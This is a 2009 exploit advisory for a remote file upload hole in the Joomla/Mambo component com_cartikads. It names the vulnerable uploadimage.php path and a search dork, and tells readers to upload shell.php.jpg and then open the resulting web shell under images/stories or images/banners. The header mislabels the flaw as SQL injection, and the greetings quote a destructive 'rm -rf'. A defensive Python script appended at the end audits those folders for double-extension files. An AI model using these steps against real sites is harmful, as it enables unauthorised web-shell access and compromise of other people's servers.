###################################################################################
# [~] Joomla components com_cartikads Remote File Upload vulnerability
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : January 02, 2009
#
###################################################################################

[ Software Information ]

[+] Vendor : http://www.cartikahosting.com
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php

[ NOTE ]

upload with extension shell.php.jpg

your shell will be

http://server/[kaMtiEz]/images/stories/shell.php.jpg
http://server/[kaMtiEz]/images/banners/shell.php.jpg

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] My mom and dad .. and not forgetting my little sibling ..
[+] tukulesto : where did u go ??
[+] Listen to the radio at http://antisecradio.fm :D

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
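
Added example, not part of the original advisory: a defender-side audit of the two upload directories named above (images/stories and images/banners). It flags files whose name carries an executable extension in any dot-separated segment (the shell.php.jpg pattern) or whose content is not an image. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumed list of extensions a PHP-enabled server may execute; adjust to the handler config.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "pht", "phar"}
# Upload destinations named in the advisory, relative to the site root.
UPLOAD_DIRS = ("images/stories", "images/banners")
# Leading bytes of the image types a banner upload should legitimately contain.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

def check_file(path):
    """Return the reasons a file found in an upload directory looks wrong."""
    reasons = []
    segments = os.path.basename(path).lower().split(".")[1:]
    if any(seg in EXECUTABLE_EXTS for seg in segments):
        reasons.append("executable extension in name")
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if not head.startswith(IMAGE_MAGIC):
        reasons.append("content is not a JPEG/PNG/GIF")
    if b"<?php" in head.lower():  # short open tags are not covered by this check
        reasons.append("PHP open tag in first 4 KiB")
    return reasons

def audit(site_root):
    """Map relative path -> reasons; Joomla's stock index.html placeholders are skipped."""
    findings = {}
    for rel in UPLOAD_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(site_root, rel)):
            for name in files:
                full = os.path.join(dirpath, name)
                reasons = [] if name == "index.html" else check_file(full)
                if reasons:
                    findings[os.path.relpath(full, site_root).replace(os.sep, "/")] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample data: one GIF-like file and one double-extension placeholder."""
    for rel in UPLOAD_DIRS:
        os.makedirs(os.path.join(root, rel))
    with open(os.path.join(root, "images/stories/logo.gif"), "wb") as fh:
        fh.write(b"GIF89a" + b"\x00" * 16)
    with open(os.path.join(root, "images/banners/ad.php.jpg"), "wb") as fh:
        fh.write(b"<?php /* constructed placeholder */ ?>")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(audit(tmp))
```

Any hit in these directories on a site running com_cartikads 1.0 warrants checking the web server access log for requests to components/com_cartikads/uploadimage.php.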